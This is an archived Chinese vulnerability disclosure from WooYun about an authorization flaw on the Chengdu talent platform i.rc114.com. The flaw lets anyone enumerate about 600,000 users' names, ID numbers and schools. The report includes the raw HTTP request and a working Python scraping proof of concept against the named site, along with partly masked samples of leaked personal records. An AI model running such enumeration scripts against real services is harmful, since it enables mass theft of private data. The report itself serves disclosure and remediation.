乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-27: 细节已通知厂商并且等待厂商处理中 2015-04-01: 厂商已经确认,细节仅向厂商公开 2015-04-11: 细节向核心白帽子及相关领域专家公开 2015-04-21: 细节向普通白帽子公开 2015-05-01: 细节向实习白帽子公开 2015-05-16: 细节向公众公开
越权操作,导致大量用户隐私信息泄露
成都市人才服务平台,网址
http://i.rc114.com
如图,注册一个账号,以合法用户登录编辑个人信息。
会发送如下HTTP POST请求
POST /RealNameRegistration.aspx/getRealNameInfoByPno HTTP/1.1Host: i.rc114.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/json; charset=utf-8X-Requested-With: XMLHttpRequestReferer: http://i.rc114.com/RealNameRegistration.aspxContent-Length: 15Cookie: Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514,1415150093; Hm_lvt_fe01b1430376b312631b121e55200580=1427341437; ASP.NET_SessionId=xf5zmts1my1232weeitx03lv; Hm_lpvt_fe01b1430376b312631b121e55200580=1427341473Connection: keep-alivePragma: no-cacheCache-Control: no-cache{ pno:'595000'}
但上述pno可从1开始遍历,返回其他人员的注册信息,包括姓名、身份证号、毕业学校等,约影响60w条数据。慢速获取数据的POC如下:
import httplib,time,codecs def crawl(strnum, file, id): paramTemplate = '''{ pno:%s}''' body = paramTemplate%strnum headers = { 'Host':'i.rc114.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'Accept-Language':'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate','Content-Type': 'application/json; charset=utf-8', 'X-Requested-With': 'XMLHttpRequest', 'Referer': 'http://i.rc114.com/RealNameRegistration.aspx', 'Content-Length': str(len(body)), 'Cookie': 'Hm_lvt_57c48c2407b9363122624c39f3e251df=1415000092,1415061514; Hm_lvt_fe01b1430376b312631b121e55200580=1415002633,1415003018,1415061505; ASP.NET_SessionId=53k2lzvxa41kle5rxw2qxz1d; Hm_lpvt_fe01b1430376b312631b121e55200580=1415083567; Hm_lpvt_57c48c2407b9363122624c39f3e251df=1415061514', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache' } try: conn = httplib.HTTPConnection('i.rc114.com',80) conn.request('POST','/RealNameRegistration.aspx/getRealNameInfoByPno',body,headers) response = conn.getresponse() print response.status, response.reason data = response.read().decode('UTF-8') file.write('id=%s:'%id) file.write(data) file.write('\n------------------------------------------------\n') conn.close() except HTTPException, e: print e.code return 1 finally: return 0def main( ): f = codecs.open('db.txt', 'a', 'utf_16') for i in range(600000,600010): strnum = str(i+1) while( crawl(strnum, f, str(i))): pass time.sleep(10) f.close() if __name__=='__main__': main()
利用上述POC可获得约60w条用户注册信息,包括姓名、身份证号、毕业学校、专业等。(下面区域一行太长,选中点右键查看源代码可看到完整信息)
*****ode**********ot;ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027四川电力职业技术学院\u0027,\"gradtime\":\u00272006-07-01\u0027,\"major\":\u0027电力**********------------**********tpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027电子科技大学\u0027,\"gradtime\":\u00272004-06-30\u0027,\"major\":\u0027电子信息工程(电^**********------------**********\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交通大学\u0027,\"gradtime\":\u00272009-01-05\u0027,\"major\":\u0027电气工^**********------------**********\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272010-07-01\u0027,\"major\":\u**********------------**********27,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交大\u0027,\"gradtime\":\u00272005-07-12\u0027,\"major\":\u0027电气工^**********------------**********027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027中专\u0027,\"gradschool\":\u0027成都铁路运输技工学校\u0027,\"gradtime\":\u00271997-07-01\u0027,\"major\"**********------------**********:\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027四川师范大学\u0027,\"gradtime\":\u00272005-06-30\u0027,\"major\"**********------------**********ot;ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027太原电力高等专科学校\u0027,\"gradtime\":\u00272000-07-01\u0027,\"major\":\u0027发^**********------------**********027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南交通大学\u0027,\"gradtime\":\u00272005-07-01\u0027,\"major\":\u002**********------------**********ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027上海应用技术学院\u0027,\"gradtime\":\u00272001-06-29\u0027,\"major\":\u0027食品化工^**********------------**********u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272006-06-30\u0027,\"major\":\u002**********------------**********7\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027西南民族大学\u0027,\"gradtime\":\u00272005-06-01\u0027,\"major\":\u002**********------------**********0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027四川大学\u0027,\"gradtime\":\u00272003-06-30\u0027,\"major\":\u0027广播^**********------------**********27,\"ctpartytime\":\u0027\u0027,\"education\":\u0027大专\u0027,\"gradschool\":\u0027成都电子科技大学\u0027,\"gradtime\":\u00272002-06-30\u0027,\"major\":\u0027^**********------------**********0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027本科\u0027,\"gradschool\":\u0027电子科技大学\u0027,\"gradtime\":\u00272002-08-01\u0027,\"major\":\u0027^**********------------**********ytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027硕士\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027**********cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********7,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------**********cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********cpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027中等专科\u0027,\"gradschool\":\u0027成都卫校\u0027,\"gradtime\":\u00272015-07-01\u0027,\"major\&quo**********------------**********ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------**********ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\u0027\**********------------**********7,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------**********27,\"ccpartytime\":\u0027\u0027,\"ctpartytime\":\u0027\u0027,\"education\":\u0027\u0027,\"gradschool\":\u0027\u0027,\"gradtime\":\u0027\u0027,\"major\":\**********------------********************cod*****
增加权限认证
危害等级:中
漏洞Rank:9
确认时间:2015-04-01 13:31
CNVD确认并复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置.
暂无